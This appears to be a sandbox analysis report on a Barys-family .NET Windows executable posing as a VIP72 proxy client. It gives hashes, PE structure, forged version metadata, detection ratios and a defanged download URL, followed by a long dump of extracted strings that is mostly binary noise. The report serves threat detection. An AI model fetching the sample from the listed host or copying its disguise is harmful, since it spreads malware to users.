MalScore
100/100
MalFamily
Barys

YWMUNUJU.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 47/65 Related 2391
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 354.00 KB (362496 bytes)
Compile time: 2018-05-25 23:09:59
MD5: dc88bed8a1c52869696b7508d157d38f
SHA1: 772167daa7e486d6911dff3acf2cb110238f4272
SHA256: 2665b52f4d78956233d150da8b07398b8fc40ff873b873c911fe6b25526e29ec
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-06-06 19:48:04
Last submission: 2018-06-06 19:48:04
Filename detected: - YWMUNUJU.exe (1)
URL file hosting
hXXp://rahenbhaedo.com/kajnm/YWMUNUJU.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-06-05 00:10:16 [47/65] VirusTotal
PE Sections 3 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x4a5d4 304640 1f1918bae84c92da15de03ec35cb5ce3 e69958684d70e6af6f122e7f88a7b938305ad916
.rsrc 0x4e000 0xdb18 56320 e2597c86c140c944d1e2060bcd97e503 eea0c04483dd3189624877953bcd9581ae431de1
.reloc 0x5c000 0xc 512 947b2bb6757d028bdb8a5a36910e5d88 ad7768061681a9e14d1acb0bcceb26f57786d82e
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x4e0e8 55063 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x5b800 20 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x5b814 772 LANG_ENGLISH SUBLANG_ENGLISH_US
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Copyright \xa9 2001-2017, VTECH
FileVersion: 1.8.3.0
FileDescription: VIP72 Proxy Tunneling Client
SpecialBuild: Engine Version 16f
Translation: 0x0409 0x04b0
CompanyName: VIP Technologies
OriginalFilename: vip72socksRUS.exe
ProductName: VIP72 Proxy Tunneling Client
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
SpecialBuild
j7jrXzITQhc4lIqjmwBh9KTV5
2a8h9gwVL51Q04SMYQtP
5jeXIIrDNol4jnBFqm9odCXEecUICuP
xSXQ6jqt4obDYU3w35cwQgt
miRbaPSFCjEbi6fiUPU9aDLiN8eK
J0cIcSNxO0HFoub0vC9Er4gdLpnuqb3ll
vfq38Dz2dIvkAFa7hrvg
040904E4
FileVersion
AYW6lu9oIm0Xz45uznBMzPzJxgEAmvbXUbGA
O159Rm7Lus3i0uboRULNCK8jwjVmcPsU40f
u0fr5z8Fiw0ZdzFna7iyk67
NAvZhWSLgqiFbUEtGMJsCO
Copyright
MsdLxs6vc9VkCy4B5s9sVZ
eugLjcCLggvGaQKJ7HCSadS
Bs0DdZf8PuiWou3DPoNZlai
StringFileInfo
Engine Version 16f
Translation
baPRWnH8FkBNBdsoZXwFCDrGnY
lACBeyurIqYk3rhVDbNzgrUZBvmwkp2Dt
H39AV1IIOT6fH9MIXur2n75hRfF0QVQcxQI
fqMvZ2QW3Lq2bkGyFvvhPicGPywBhbTwlj
tVncVjHEydfRBCz4TdtVkclUJsmwVlyq59
ALswZ0KOtLNW3KZ7lae183UV9YOnOo
VS_VERSION_INFO
2001-2017, VTECH
1.8.3.0
LSaxyH7J1dhxByEHEP6zMnvKX4lA6x
CwpEvqG1qNKWmDTu57G3jyWdbIDkpj4n1RkHZs
It6YoWb8MXCOcDKeN0STDkuxELff9ctEzpsOW9
cSaZBWgBNugNzGgtYDbL8XuOgKiCtS3hEqdp
DF6AXu4tKfF2mPUReT74
FileDescription
UnFUjnmbF1yUc9xEy3w03G7dFObI
OriginalFilename
daURYHWlMvndvZGDJ99puH
LegalCopyright
0RU
lYPn6vfY8sdFpSHyj7Sjmgp9RJyEsQoAMqlX
VarFileInfo
GTvYJDLYHCmYw4MtdTvEYT1GS1FHw2fIBw
xzze1sI15rQfbYdqBiWCSVS
CompanyName
MjnokPHgJ1UVYUNw6WAdBvdR3z1UMA1p2Qg
qJ4zCbiufKLFesQOzponiaD2o
ProductName
VIP72 Proxy Tunneling Client
VIP Technologies
sE635TEK8a3VOUPUBdLwzWba
nplHPPVFu9ZUGbfmrJGF2YhwcivnuTKchX8v
vip72socksRUS.exe
` [+
<"mH
#Mg&
yc !Y
@I%c +^
AFaG
J op
YmZq
$Q{/j
xl+O@
s]e:2oc
L&!d.
BD)b
}\!!2
-RE=
:{e&0G
*]z&
>>#U
eOJ
y&p^
cu K@)
PNG
:oj$
K6!M
T!my
Ql-s
<`-vN,
$a!}
do=5
:Ar[&0G;Q
F'0e
eP>?
Mo[~
cPJz[LF
#N&>f
ob u9
#3 S
XAob
8A ]
/ !
|P=v
?_W|}T
l6/g
FhU|
}/`lr
?k9x
gmY%
[<ev
=~{1
2H]I
B w
~j2\
baPRWnH8FkBNBdsoZXwFCDrGnY
Z 2#
nH;H
2CvjE`
8S6;
kHvd
f_xT
oO7py=
pk sb
][Ir
l|F>+
)4G
kKA'
G 2c)Qx
=2~r ^.KB>
C]As
tmG
Qd?j
5/x"
&%tU
BZji9
`F*
$_'v
{lt$
z2oD
B0QR
WR'rz
Sba
=F L'
<e[
`"b3
EL,
4CRJ
I5rH
P#?3
x0}<
.q{
&k1+
<;wg
!t!
XzWG9u
:O`wo>u
8ae+E
y\\f
<Jyg5
Tubp
*=N.H
L5jHoI
(P!:
A_yC7P$
"nxe
G|?
|xUr
4t]-
ZpZ0
fy7 _
#hT(N
z m
(U,K
.x?/
J5^
8z._
EDDDDZJHX
Dn*K
cPC+
u{zP
41`7
a!u(
6 4E
w`u?{/4$
dVDi@
J$32
K0_N8
vS o
G}6H
72[9
u,@g
@nf)
$0:?1
0\yxd
0S+
1L?!
^@hY
09 m
y Yk#!eW
0<_!
b.{
'{g|}9&(/
jNuR
)JCR
"&|e
op"{
I#Hm<
:/.4$#
[@Oks
7m;@
Xfhd
qki:
G+J\
wUEY~
.{1'
g\ B
C!ylE
_)Qm
D`'<
(%C*
Jc5A
3Mhn
\lak
;[D2
<4q
!&f)
:s=
= !t!
fEg?- .N2Z
8.=h
ABu{
{sEh
dB}2f
\y
dNqi
1r;>
5fx@
z x\
B,io
EN~v)
M"5Z
*Zf+
#.yE
re-eZ
~:>WN>Y
qs_E[
UoT_
; "B
ABc.
!]$
`[ P
OFH]
~*gB
OQ)e
lt&L
?b qj
@{_B
7OpL
,fj:P
u.WS
ClAZ
O#T&
n$ s2
d$K2
zT,asH
q#s
!s@w
b>Hz
9 X9z?p
xA)Z
kSu&
P9bC
+=O}3
<}b7\p
^2+M
LJ?t
v s
C x"& I
|LBM
!gvfD+
/"kL
"@n)Y1
P2A
FnrC
\{d T
Kj)v
IFAl#8
c{ )
R:tpb
zS!U
U!YL
BUpW
% &Oa
'.ZF`
@fA n
j.6yF
X^f<:
D!UPf
Ra"#
x0C6
b^!hve+
6Xf
'V z
)R/`
3Ar0
4Cmx
SA w
&DZr
X>EQ
DeI
|y#A;`
|+zU
Vt2h
=_ #4ee7
nZIb0
R9cC
ad2kcC
Jacq
5mhH#
nx+;
_qE0n
n98YX
@43<
S*IVUq
T.stN
FiE
qRlC
8F'N
3LXq
PSg
0 ^
oT.(
List`1
&cbpJ9
[cyeaOfq
K2? #Q
p{N"
AppDomain
69 gw
auM'
OsHHp
o%JB
D;i
_ !#
<a?W
ajA{
kxIt
v2.0.50727
e& Y
0wgB}
fp<%
z"3^
|n U
d QoS
c?@"
9mNq
Apmx
=>v`
Nh(=
E|a
pCPaH<
B| W
T1Tw
b/N\
y3/B
AD]7e
.rv7O0
E lY
NV!FVT^
:0y\
E=8|
DF6AXu4tKfF2mPUReT74
E+TEs/
tz@d
]pbYTsB v
!.BS
UyXp5
exAw
\8dX
D>be
&-d3ADqs
5[(i
RG-}
""-22
9_;F
>}Tyc
+RG4
II"s
YjcC q
8HzbAr3
Mpek
TJJFn
}mxt
'<\EHVNVCQ
l15l
?/%`ma'
N`+C
^z1^
+4BH
ni?Z
%/-"N8
yCG'
""M$
u1e(
IK@w
9b@6
%zgpI
w,'D0
O% Q
GY%6
O7lJ
k n:
*+IM
fTlZ
y\tH
E ~ls FX
aA.}u;
Y]t|s
&%t<[df
SL ;
;&M%
;s[i
qq}i
@mJ^
`(;m 0
5CNW-Y yA
]oU^
z7a~@
~Y-o
dby5
Mg%!
v;u
H 3 l
SAe
4Zp-
'$k
<R[-
[^S[
9bue\
""=(
O(Cy
[ r0=
>R'E
#Blob
Lo ^
f]zOX
0@I4Q
AH)y
PA(S
i#_P
yS[4
!</z+
HE%|
TA14WT
EJ',\Vc{
J^z4y
~oZB
,_AL
es2L
2a8h9gwVL51Q04SMYQtP
IK<a
~Z j{
C<%BRo
I r)i=s
J=h
G7(/
^z&z
&r8`vU
gz||
6*-W
R2oo
u'UMe
lK{+
h b14
E ]
<Q-V
t!N[;
F}s'
oPC|
p]SF_5
J-tx#
Type
gJ8hn
NR*AU
610NOv
7=Nw
niZ"Q
z_Im
,5!z
|:Qi
c^XY
-3eD
y? ]*riMH
3`N%
6 G^
|V><
ljT73.E=h.
+VG
3$hn
op_LessThan
D}bx*=
G1rd3f
! pV
~e5$,
i*5n~X
EN9i
""=$u2
Y}jPCs$8
,N[,
08G^^k
GdB{
z[Qe
Kp}c
@e f
f}3
O@=5F
Gn;
YpN,
}H$Cqk
7P}5
,+nu
.2]`
k7'm
}g!,G
oqA [-
cf!H`
1 ~J
kJRf
/8nr
{qt~
&Hl%
pz^K,
A&9a
r2 "(
0 +F
o_V6
OG?] #pO
a&5[
QqoF
Q23'
o^?c
K\7r
mdeW
<"Dn
f]aH[
W^f^
[3;"&
CoVV
Zx s~1l
d xC
T^R)^
'' *
H h&PO1a5
`\sT 0
ly^4
%=fi
c<_
J%JN(
=sG6X
#k<x
08@8&
$'2<
X|)B
Y{lh
,kK
d @w
r ;%Z
J++"-*T
7+Kk{*
jJeO
4t;l
^~ j
+ 2nz
_ wC
]!#6
#V 1
ldX+
WY|P
Vk |
{b{r
R' (pLC
? Hr_;(
F|UWt'V
jn2w
aYx
wq}}
p{o2KS
nz8A
|Y B9H
QwpA%
l+-%
`57x
bD&A
2yQY
j.9f
8GWje
sz|5
h@"b
dWQ4Sq!
e vJ
r@ed
S8&<
-Iljp
VbFo
l `Jn
QqDY
@r77e
KbBx
{~qN
_CorExeMain
t7#<k
`) V
eVI>Q
^<m'
S=/J
!{"`7
EzZ2v
RkOk
<d`Z
ENR=@
l 0c
i_T]
]=X(9
#eqfx^}-WPT@2
Xy%L:
xzze1sI15rQfbYdqBiWCSVS
:TEUfy[
y57x
70/"O
|- x
,bo8
cc)^)K${B
;dv_
Z[@8
@aI8
-d*H
#ix3FX Z
-5C|
^!Y,_Jf
(|zo
[z3Y
"[cz
DialogResult
Y(Srm5
?<L%}TO
NafEN
QVH$
GnCD
><\M$v_
?3,L
}hk_
.text
:Evd
m`88
~( Z"
kiA
/]}
M_KbO
\:N($3
?y }#
aE $
(`Vl
:}(yt%%
<(H<
*Ism
O*-Z
R~b]
\ <Y
xo]&
>YFr
}||o
;H3F
1!a_
/r3Q
9^HA
AGhwH
t Dx7
T4e_
nmI5
nLG
=s\[
J 4*
^X1k
3Cw?
jc^awo
&A_[
jGN}c
F:7;
wL_K
'dR3
eB<oJ
$zRc
%;#%u
w>t2
00nDgLDg0
}7).&
{,;]
|9~
daURYHWlMvndvZGDJ99puH
.6'\I
_E6X
!sK^
vF3
6iC,v
;@gz
:(Ml&
evA
=c|Xd
B@eY
]t=bD
.}OE
Y-V}
^.sY
H\?r'4
bQtw$<
L=83x
u!Zv
ccVuhRt
&pxqb
UI/P Tj
7`pQNP
_ to
6y7<
K]-B
>]r^
#jeW
d'k
-C:
#O3D
yjZX
*%F%}
8)Q_e
GMpq
E++ S
&It6YoWb8MXCOcDKeN0STDkuxELff9ctEzpsOW9
gm%3
vba2
&v[b
dRiY
>6fma
Rs1{`_B
/ttte
>J= ?:v
.L^
LY{CQ8T
`i~[
;l*@
3xx
*Ybw
7e^)
7g^5
@ Xg0
+L ?
]*vg
)|yf'
3f)=
3N)a
2JK|n
x[y-
~"%i
?f2?
!GB2Ei@
dc?}
=qjU
gUi
<:O>
o&|if
?1Zf
c)]Z-
1<iHt
ni u
umnIDV
j ]:t
:Ae]
{3ar2
u {
2it{
uIE 4
!ha"
G_j$ .P
2lq4W
FbrH
Y7z
`.rsrc
gU{j~9
Al,rF
['O2
i!Rb
jCDn
}RU^
b53lf
yGf5U
;7nI
C3Jip
MUe&
Q 0b
\noF
^)nyP
C6&V
IK+S
GD=)
Ss3
2P@<
9nd_O
}f i
>+FN
"""""-'u
UH S
1!H1
.ctor
hU(i
X0nu
Q"eNJk
8DlT
*6 +
PkRJ'
[^Fi
\vf
4 @z
+x[;
KL(ASz+Z
F cv
[DtW
fUuhWx
"OoL
;0Zy
Sxi5$U>
|dxe
N^90
8gsu
M hO
.i{~`
BB<
y Hr
}9UJf
:~70
UhjO
;zj/
GetTypeFromHandle
:L6x
XpJ,
J` '/
b =Y
n<X
1ipP
{AXJ
`Pg|Y
KHbb&
?@8p
S<9=
tQ3%
E"AH
20l{
})hB
HK_Bn
:wD
O3a
v9 -oE
#g (.OR(
t^^}
GuS,(
UvF#
lJLqy
i4~K
SDrq
g@@g
n1?.
Load
>M: ;
rWQ1
GS}OU
xEQ@
z>uL
:BoL
1(ObeV~
L6w>
ez;E
F}9V
(rqg+
aK4q
vr$hk
9m=J
LgY
(9N6
,j>N
= s_
PA3?
!n7(
B]D&
!I]s
_>7'$
^S#
0 7L
KpJLR
w%~]
dSXN
Ifr"
~OJQ
]xTW+V
~wMU
=roU
(>;L
v;G:
x0QNE
/U q
i@R'
4Jye<9
*D,>
-D5z
Z\|WeISU7 -
D;OB;
1 w?
%c,h
^_Hz#E
dXf8d1&;!
`2gzX
iXBg
"V/7
qb2h
{ F
"2gMB
EzVK
/{)
L|n
sjXM
3 X(
Oya%
m%Xz`
db"*
kA3B
g>a%
GsJ A
>+v
SY/-
dvw[H+
6 UP
4!ZG
|L @
?KJYu(
gLmt%
V6 62
SJJ`
}_6*m
wOsP
PLLR
tin
2%v3
D~5fx
&"N5
/Xib
[np#
zW3K
`k8Z
LqX*j&
h9BwT
+ 3bYH
G9en
Qc}e
Show
$}a?
bi9`RD
"Ho0:|
VlYo
i R2
!J0cIcSNxO0HFoub0vC9Er4gdLpnuqb3ll
gv##
8qZ",
ru(\
19R\
q2r e
[AM,
.i.J
vi#_~
9Q
dQ0^ WS
QAK6
L*D(
hkhF
M[P@
hhrA
MsdLxs6vc9VkCy4B5s9sVZ
&. 0{
wLca
* M.gf
6623
wOcG4B
ZXFz
:W",
JUO:
%
IqjN
System.Windows.Forms
.IGV
"A8O
@dF0
xzPw
#R_
j*y
]mK*
_tFh
`+O C~
{`jiGa
s +w
fTlV
l}C6
o1Ln\
hI]"
WKED
siyM)
.~"|Z
YH|#
w3
2bUE|
(fA
J,!t
9kVDk
7MX=
p<f8
SlHn
6t}}
_K=d
K.R&
@;I
qz-g
:'Fq
CK31k
gy Y
fwc'
QGU7
c@>!
l%7!u
%$N3 ,
1SJAY'
D F
cxB&
#8TG4^
<ONz
IX$4
R LM]<h
|6Q n
D_.l8EX
cL>
I$+S
5W2~ Ze3
CmV\ z
B-e/
8oi9+
T+,Lj
N^$'
vH}`
32-a{
<s/8
;/nL
wI6G
'%CUw
_\jBK?
q<s%
a" t
TxeRio
lwc
}g15!n
OwZ[
hcY1;
Qm,n^[=
&PQG
-2aV
sz4y
O*Cj
,N]]-[
VhEh
2n o0k
e 'Hv
E;LG
KV`U
D:~g
=mTr
i)a8
aA"*
HGYu
oZ]r
:`U9
z(!@
hX0w
HL>F
&D{y
UL%v
<N[OF#
5MJ3
we~t
|Q =
iD\k
JXYh
=+gny
*887
{>rI
]YR=
gDQKv
[Fm] <
LR1=p
5N9
;{n]8
z*WN
G"mB
Cf=s
Q0rt
KHKr
YkrV
f;K0q
3c1Ej
!t!
:0xn9oI6>bM
>/98
AZ~4
ndVS~2oZ
jFoI
.y]/J]
b!AL
Od>D:
f54
d]?x
~NL/k_
?6p[A
$SOo
LHI]
FZ0i
q|}7p
Gl{$ W
[Wm:
o+dF
437`*
-t;$
z><E
f W:
System
S?hz
1h t
XyMW A
iYaE
k+uVu
Uk/+
#H39AV1IIOT6fH9MIXur2n75hRfF0QVQcxQI
$r!q
RP=#5
* {Br.
^Lj*/
ugI:
!%XE
NA?\
P h|
_j*62
'| &
uzwP
B-W,
?a]r
!L'J
SVsJ
|OT4"
<`L.
"ugN
.={a
"WfF
{Yoa
,wP]
8Cek
&`,C&
.&MT
] u(
,c,gM
Ua@W
~n`[
4b1p{
#tWT
y>4
R0z]
NL o
nkYl&3[,@
z9=;e
s'.b
Dm@0
[>a9l
#Strings
IeO;
vb>N8
LI2y
:6Ta
:auk
oVIk
V@=Y
Pi7i?
d8 : q
eP_ZA
9E'2
h/ar$O
/R/=0
AYRn
82X
<}
4|"Myt
lWP@
)'~eh
O rL
c7ib
Y(S+
>T1=&=]
LC"SY
S~7d
cyK=
R cq
3d#bU
o/ [F
*J?!
rfx1
p -Au
P`Mj]
Oi_7}
R`i4
EDD~
W~|kbB
^h<c
l\PTs+
R a
uhVy?
by=?
/qMwPV
VK aUo
5#w=~~
m\Y
M#-
IV9|
^g7'
_',y7k
.YyTko\
7oRj
Q t>
\[Vfi
\Y;?/
Z \V
(S`l
oB>
L<_q
H5^~
cXj\
byh27
8#F{
_fn
=vj$K>
Sar&f
"j-U
sZ u
S_*9)
]r6T
m>w"%
,asD]B
M@"yu
MQ t
MoYx=
} CS
c<O{
BTGG
"zqwE O
%z20
YS+8
sv48
a.Zfn
3)0,
g9TO
)ry5
pN+v
_FGU"
f&t?
Cg,Q}
^~M5
JW ]
]j%{
m~0$6
8'mMO
D3+?*sD
.uRy
!/ O7W;
$//Z\E/
pZxB
&4\]W
b,Z <
]jw.u
Y|s]c
omd4
w2iv
v7m
/ /+
iwDO
JzA/
UaY
qkP%
|b|*>
tvIn
L8(?t
N;`,
7WHCH7<8%
c/#'Z
Wri{L
{;72G
Sg>p
P!i+
@>.e
DvYz
Uxbd
&KdI
bt~9
a =>
x=M~Z
,cV~
4h]#
3'N2
F/K
wOi3
=z90
1lge
]uX=
504Y
[chMX
?~/w
EDv{
"*z{
>Jd$
A3!j
Qvc~
3o9*
V mf
k%%^
-2J 3
1Cgy
8H{7A
fBbx1{
iJ9&.
'#x$P
}B?px
Kfl@Rq
R7]N
A:R #uf
d&Ki
FPa#S
qqNdQ\
G76L Ngd
mpfU
x0"^
BZ*%
{hyN
bhA?
YE;8{
J&k,
-wM6
Vy|U
8x#P
KItgB
LGb2
cDlm
ds p
"ZH
0 0]
System.Collections.Generic
.z"%
w f=
B95.s
"U).
e#g6
G:;D
JsI
B)
>! N
2Bg_D
KG@T
G"lX
T.=B
`1H~
adjt
`]nZOUj
RBGZ
X(_?R
Dh7G
?c1uZ
02P1
9^1V
Ah90
Cv(d
~a5q2
QStZ
?`(Z
$lYPn6vfY8sdFpSHyj7Sjmgp9RJyEsQoAMqlX
eDBk
Lvh<P
27]"Q
B0dY:Yu
+kQN
0hSzH
<&A
_~S.k
\dVeYO[
>n,D
HgOC
C3E6
=,Oh
<UW/
&? :
3"~v
RBGi
& \%p
BSmTc
>(^M
A/+
G f}
\F7
f D%
c#vFt
`J,~
{O-y|
N|`,
(?
s( ^
}nlb
cr$/)X|2
8rZUf
#~C4vn
Osyu
zd>?
+w#}
`%<`
XGzV
XA~"C
z.5
D[R&
s-wm
d+&!
RuntimeCompatibilityAttribute
"l-0
~p ym
8\`@
zbY@
RuntimeTypeHandle
}8+Oe
"oA2
KL6]=F?>
?hv`
a/RZ
,h[o,
fe'
42HG
lKI#D
MMynId
vzwJn
(uB$
b\pO
<oVbr
<3^v
AAw9
Z!bA
]<71
"MHE
e:+
{T}L
Dx%r
AgI!q
8dy3K
"""-+4` rV
$cSaZBWgBNugNzGgtYDbL8XuOgKiCtS3hEqdp
~?4\
Q|G}
mG;[x&
~)8
dW)Q
i P5
:cJ1
E1|e
fol p7+
_Bh
J4Ja
a` `
:jEc
Tz")
6+ne
@S'!
[0zO
-1@:qvM
JA0SvwBg
%.H
sJ5UP
7'H^[cO`;
LW=d
PA-3
q#HB
}iaz
p=w A
yp;Ce
M *PR
VY`
/}Toq
cbWx
n:M6
\c*9
W2 735
UJVd
=(yk
{Bi0
, 8*-x
;ujOu)
| V)0
fe'L
E<]x
<PF .
|D`ON`
LwX^
/(\)
aE1
T? )G![K
6.Cj {
+!! !
tJRN
#/eHy
8=kD
Bo&hV-
R~l:I
M:Tr
RXF`
4}m$
+gCh=I
`wd#
WAh-
;G)c
~u@n6
dR}X
W&Q&
n ,K
3|Yd
,y':
4@E`l6
@=ak
E<OK
Wjj
Yc~fB
3zJq
BoJ@)m
W;k4
*?mQ
%_t_|
*u+zH
o(,x3;4
LP}D
A;`Z
L}]|X
dlpk
Fkz?K
!$Ku
= NV)
i9+%k
?z>ux^
MethodBase
2DSI^
\%".
#PF !
'72G
WHx%
SRJ @r
)xd|
8ZR=
Tg)m
?;c+.
i+S?,mw
7sjm<
Z l$
MUJ
><?
Bzu7!
JGQX
]A6
n~+
NVw'N.x
7#Ta@
Keq.
^aNv}L
x8 c
_Jy%V
C ?E{M1K
mAh}
EB1/
!>L=
qj
:JM
5F@I
[5Rl
b&8R:
>C6
)v3V=:
FL8T
x!L(
UO!o
J| C
|-uU
g4e
u]
7nVQL
KABg
gM0O
T23.m
;Ae]/
BIL%%i
8$ B
Ra}rF
=hN3
wn(?Lu?
Uu_W
99IjV-
lXw
ztxv
4x ~
[&;E
UnverifiableCodeAttribute
jmjt<
Lr}
`(T-
u0fr5z8Fiw0ZdzFna7iyk67
6cyD96
{x|M
\eF((
=WT3
;tLh
Ao 5
F/}f%)
fVaeq
}ov
0 C
f,U\
+2A:
#_ZgFN
dxk`4
fbOB%&{"
<FU@M
rDSM
$J]$Pz
N.bM
rxk&
Lv;3:
J\?n"G
3V 6
;-ei#
b;jy
m)'4
x+tV39
Q Jsj
CB!oPWV
fDRA
^k6s
:MX$o
u.o
=Dov
WIpLE
nn-e
9(?E
W5S*
zd+ Xt
lP E;gl
/VB480
gg8 w
XC7z@
80g.
k<p
W>4D
HkA8
5mM+
`+B[
csE)$
xY7 L
=HQ}
B1P`R
V T%?W.
ToArray
+Q 9
8"Uph\
?5pd
<Xfo
s%QGl
H88
kxgL`
{&qK4Qx?/}
~6C*
"""""
cw@W
S1&6Pe3
*3@Q
W Wm
J*7"JQt
u Dv
;mGX
/j[h
f*b0G
h6C3w
c-U#
.rUd7
Mn*g
4GN(
qL{h
1uq~
@f! 8
JX.
tM]6
l"a
@6zq
6ya*
(a#I
^Y7~
q6U)
T<{1
r !5
-w@>
+Z5 2B
,wF
}vP
.+po
E%^2
\2>7
XM 6+/
^T]T
A{DW
/=m/
]pOR$(8b
\$vi
DateTime
ab/D`
i1g)&
a^T<
8v+ !.
e'H]
X-x+
j"}T
3e*Y!
iNWr
zh[o
x%`8
p2YyZ
- Z \n
q`}_
"1-E
[-_YRaap
R"?p
06LRC
~@WP
R:
F@xm
@JQE4
*0?'
Wch]
G7t]l
"~DAUj
]rcP
cl #c
%t-b
L%b$
wFza
@t&$I
Y;oc
98,g
0RKAkH
|Qy{
z/"0_
m*$la:3
@iYU
wS*z
549
,K|Rz
?E_?
%qUs29
1DCd&
:t n
gyV}
(n>@
O20j.
=f L
d2mU
ICryptoTransform
@Lm&
)%0%
Z1G6s
vsfD
1zD(
md+
WL[w
l,IQ
v'Zh`n
_m.]jMB
e0Ox
CLA R
pONq
ukMU
zs@m2
57?+
k,fr
HsUn
g@ai
uJle
6}O %>
LW<7
t<x:Eg
8Auc/J
)m-E
:zQI~
OoqCeX_B
E>Ja
}2& <
jger%P
c?*J~
\z!OD
x4s,
System.Security.Cryptography
nQMl
WDGA&6Q3?
slLC
Yb<.
6Lhb
Eg9~
SkipVerification
$Rg$7
fK\k
A[@T
6:AU
) Q)Q
$IOcc
-XwaU
Id}
Sr80
&=,g}
*[}g
T )Rq
/%yL?
zg(.H7O
tXu+
4{mV
6"a-
k(*j
=U-;
U =a
X-z%k
*PK
2>@&
d[*@g
`yWw
Zlk.9'
.Wu?
rKl!Dj
Y7 I
hf;p
Pr P
a? z
I:H0
+jW~
fUb;
get_CurrentDomain
|K[*F=q
P8u: 8
hP_TG:W
6fwdS=
tKzy
LwG=KR\
Eod
}x P\{
He)dE<
{p$=
8h(v
9wo>
{Q"N
2)#/&v0J9
!i!w
g8a|3
d<Q5
5p>a
@_QgB
W=SU>
Zw"n(
ff&=Hz
ha+y
$c M
o0I_
%G8f
YxK
DW!q
$9___
s)Ly
L\)-
}K[6_
Q8`+
Fl%t
JIjg
E}\H:
pHYs
I 9-
#FX<>
z]mk
QT}h
dO9J
{$7*
Az(=0
'z-p
cQ]Ck
n!xT
mh?o
/ vd
q au
]3E}
mscoree.dll
Si* W
c..r
7j|'q
gy--
|!m ]6
e|+0
jtr
1Hes
PW ]s
d2*L
3qJv<
d Fd
Nk{1
)|b>
&M u
[~g,Q
,> \
Invoke
G">$
s1!@wl
JhNM
-@oX
'b_{
j Xu
v#PI"
5?_g>
46j?%u
Q%wb
L"le
`q Y
P~ee[s
x|b
OZ3dk3
i!<*
=uzZ/
_;="
UK~
V _,
System.Reflection
E2 x
cN+ll
0d&lr[6-
uM5Xy
HF@c
Uh; ,
Xkx~6
{c?J
";$K
tO<\
p!]7
7fbC
oIh=y
wi&2G;%
:Z9\;A>v
xaLJH
yovQ
u3 y
7G T
d>%1
?(D_
$dn
Led]
4V8d
3%,|
M2""
r[!%
oof0
x> mz
bd3ws>m
6"c$Z
4b`3
wg5g
u0%|6
z~ T
?/m)x
6?E\h6
1e."
@ N
^m C
dJbs
X+#'g
BGd;
ZF 7
@.reloc
@] s
3t[@
h QOpC
)^2(QUw
2K;U
r6B^z
_hz2
;fJALD
7B42
B*$pDA
'g"_
@mR#9
(f45?
3g@qi{
;3Qr
I:6h1
|l_2
+Y2^
c.8u
V?g=
?yM$1
i9pA|@
.Af*
[N;~B>
B]R8
,u)J
>f_+{
WrapNonExceptionThrows
vJz[
E+9F
vNAa\l8V
F*[oj)]
yn,2^
/*n
z<tN
0Y\EzV
zd q
}U;9}s
VR}1
vo+3
l)--
f-c%
?TU
h]kW
9V_t*N
"TAa
1m(TD
"jm<)
A@bo
x}:`
B!wn
G'vV
kwyf
m+j;
ZVBvn
n:iX1W
Y}L7
Wa5';
0h7"
_/ p
BV8c
H-8gPw
UZ=r _6
.|`|l
by}st
P+OW
hc&*
#nh?
(.F&6
{4yazU
P2R(
8H}4t
8 1H
o/1V
Q785&
2_A/cz ;
/k:@
}z|H
o ts
GV}x
U~
MessageBox
zOai}
3av:
Z2"n
E!5R
T0o4:
Uv.K
uB<Tu
sYmr
VN"H
G@7=s%
6!,R
x(g
5Pe!
OlXk
Dfit
3f6_"O
N>g^
,0qK
g$0-b
jQep
~/XjgyO
+ 6
!tkA
Z/VK
B+hX
;;m.r
ClJx
R@n "
mA{vl
gF k
2h}(
YU/%s
phir2
7E.uD
:~s.-
NW$>0
_Bz!
lbs%
Ih$i,
X^L~lz}
vK`0
ZvA^'8
7^,R](*
"&PH
l,J8
qK[V
r#d+'
y1BM
msJ(
qyX>
(X?+
S@S?
qSUP
&CwpEvqG1qNKWmDTu57G3jyWdbIDkpj4n1RkHZs
:Va= Y
IFH4
v)rtY;
dj z
o:}2
@MmT[
dv*K
43h(
te89
t0
-TnM[
-Bxi
&}2l_
\7(M
xKe$^
w}b6
G(7J
Lk h
AZs=
Hsw%
\MBI
$d~EmG
W^>S
[2nJ
u'V1L1
"Vr
ZeN
B7>r
! %}YfdZ
J1-M
|X2xK#
\>A~
_'v
DYf
K~ ~ty
[ Z@
- ~>
dz f
(Cq1
Gb:!
JHaO
Q y|
L@\T
D{0%
upd<
##hgP
uZ3
z"[7
d; Iy
=*%k
ryF7
|cjZ
Sj$F
-tIb
k,,<
[^IU*]
G^It\&;!
s2War
i)#^
wu::
!Fh
FLU
uA]v
{z87PC
."e%t
_Y h
KoVBwXX
I!X
h@1?
X{E3C
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
^ttH
+zZ"L@
sE635TEK8a3VOUPUBdLwzWba
pxy<
{8}
~eE[
tg@W
! M
0>c}
u}Vc
|a b
P8Y
CS<a
Z 85Qm
PUVRLz
z]9M$
3J^l
C'X&B}
OBq
TYBY\
Z#l
L,S|
YZ
Y'
!*&.
zee'
_nQGx
a`xv
zH`;@
a4[\O2^x
iVMm8
PtQt
jE^!
1c31
M&!O$q
?kfH.
Hxl3
9AXl:
zZc]#a
RM&q
>2fO
0|n)r
3l:v:
dsLB
E I>
! LQ
&r,&
]~ZlUXN
7-Nc2?
RPVit
aVj{V
zsz_M
"j; A
_Lhg$
JH [
)?*3
y>W1yLh
QD>-
m<ES
cD;=
M8e"
:Ge
kSE
kO'{
)u]QYP
era<
m'PH
',LL
@"5X
<GL[
#aly
M2rp
%s1H
o-!c
(ZI/
W&{
fOp}
E|~ko
< OQ
dd<Y
pG[l
1; m,[
07M.)
cn)R
jgLa +;s`v
n "K
-dl
-ZE
}^d
/kl!
{{ A;
O[/]o
